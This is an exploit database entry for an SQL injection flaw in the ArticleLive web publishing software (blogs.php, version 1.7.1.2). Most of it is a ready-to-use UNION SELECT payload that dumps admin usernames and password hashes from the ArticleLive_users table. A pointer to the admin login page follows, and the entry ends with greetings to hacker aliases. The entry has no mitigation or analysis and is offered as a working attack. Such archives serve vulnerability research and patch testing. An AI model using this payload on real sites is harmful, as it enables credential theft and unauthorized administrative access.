ArticleLive blogs.php?Id 1.7.1.2 - SQL Injection Vulnerability

2010-01-01T00:00:00
ID EDB-ID:10884
Type exploitdb
Reporter BAYBORA
Modified 2010-01-01T00:00:00

Description

ArticleLive (blogs.php?Id) SQL Injection Vulnerability. Webapps exploit for asp platform

                                        
                                            *******************************************************************************
# Author   : Baybora
# Product  : ArticleLive (Interspire Website Publisher)
# Version  : NX.1.7.1.2 (and possibly earlier versions)
# Download : http://www.interspire.com/
# Price    : $ 249
# Site     : www.1923turk.biz

 
Vulnerable script: blogs.php?Id = (SQL-injection)

---------------------------------------------------------


http://server/[path]//blogs.php?id=  [SQL Inject]


blogs.php?id=-768+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ArticleLive_users+limit+01--


Admin Login->


http://server/[path]/admin/


"""""""""""""""""""""

Gamoscu - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO